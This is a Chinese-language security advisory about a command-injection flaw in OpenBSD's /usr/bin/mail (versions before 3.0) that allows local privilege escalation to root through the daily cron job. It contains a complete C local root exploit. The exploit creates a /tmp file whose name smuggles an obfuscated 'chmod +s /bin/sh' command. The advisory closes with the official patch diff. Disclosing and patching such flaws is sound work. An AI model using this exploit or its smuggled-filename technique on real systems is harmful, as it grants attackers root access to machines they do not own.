受影响系统
openbsd <3.0
详细描述
Openbsd中的/usr/bin/mail非交互方式中处理转义字符~!时存在漏洞，通过在其后追加任意命令，可导致此命令以执行MAIL用户的权利执行，通过CRON任务，可能导致权限提升到ROOT。

测试代码
/*
* (c) 2002 venglin@freebsd.lublin.pl
*
* OpenBSD 3.0 (before 08 Apr 2002)
* /etc/security + /usr/bin/mail local root exploit
*
* Run the exploit and wait for /etc/daily executed from crontab.
* /bin/sh will be suid root next day morning.
*
* Credit goes to urbanek@openbsd.cz for discovering vulnerability.
*
*/

#include <fcntl.h>


int main(void)
{
int fd;


chdir("/tmp");
fd = open("\n~!chmod +s `perl -e 'print \"\\057\\142\\151\\156\\057\\163\\150\"'`\n", O_CREAT|O_WRONLY, 04777);


if (fd)
close(fd);
}

解决方案
补丁下载：

http://www.openbsd.org/cgi-bin/cvsweb/src/usr.bin/mail/collect.c.diff?r1=1.23&r2=1.24

Index: collect.c
===================================================================
RCS file: /cvs/src/usr.bin/mail/collect.c,v
retrieving revision 1.23
retrieving revision 1.24
diff -u -r1.23 -r1.24
--- collect.c 2001/11/21 15:26:39 1.23
+++ collect.c 2002/04/08 20:27:17 1.24
@@ -1,4 +1,4 @@
-/* $OpenBSD: collect.c,v 1.23 2001/11/21 15:26:39 millert Exp $ */
+/* $OpenBSD: collect.c,v 1.24 2002/04/08 20:27:17 millert Exp $ */
/* $NetBSD: collect.c,v 1.9 1997/07/09 05:25:45 mikel Exp $ */

/*
@@ -38,7 +38,7 @@
#if 0
static const char sccsid[] = "@(#)collect.c 8.2 (Berkeley) 4/19/94";
#else
-static const char rcsid[] = "$OpenBSD: collect.c,v 1.23 2001/11/21 15:26:39 millert Exp $";
+static const char rcsid[] = "$OpenBSD: collect.c,v 1.24 2002/04/08 20:27:17 millert Exp $";
#endif
#endif /* not lint */

@@ -161,7 +161,8 @@
value("interactive") != NULL && !lastlong &&
(value("dot") != NULL || value("ignoreeof") != NULL))
break;
- if (linebuf[0] != escape || lastlong) {
+ if (linebuf[0] != escape || value("interactive") == NULL ||
+ lastlong) {
if (putline(collf, linebuf, !longline) < 0)
goto err;
continue;